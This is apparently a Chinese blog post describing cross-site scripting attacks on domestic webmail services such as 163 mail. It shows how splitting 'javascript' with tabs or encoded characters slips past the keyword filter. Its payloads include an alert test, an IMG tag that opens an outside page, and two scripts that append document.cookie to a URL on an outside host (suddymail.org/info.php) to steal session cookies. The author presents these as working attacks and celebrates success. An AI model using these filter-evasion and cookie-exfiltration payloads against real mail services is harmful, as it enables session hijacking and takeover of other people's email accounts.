关于国内邮箱的跨站攻击

163检测javascript 和java

所以用tab断开的时候不能断在java后面

插入语句如下

javas cript:alert(/tt/);

收信。成功弹出提示。

HOHO。

其他的:

<IMG SRC="jav&#x0D;ascript:window&#46;open('http://www&#46;wangluo&#46;be/test/wm&#46;htm');">


javas    cript:tt=/http:/+/home.suddymail.org/+/info.php?/+document.cookie;tt=tt.substr(1,tt.length);alert(tt);window.open(tt)



javas    cript:tt=/http:/+/home.suddymail.org/+/info.php?/+document.cookie;tt=tt.substr(1,tt.length);window.open(tt)

« 上一篇 | 下一篇 »

发表评论

评论内容 (必填):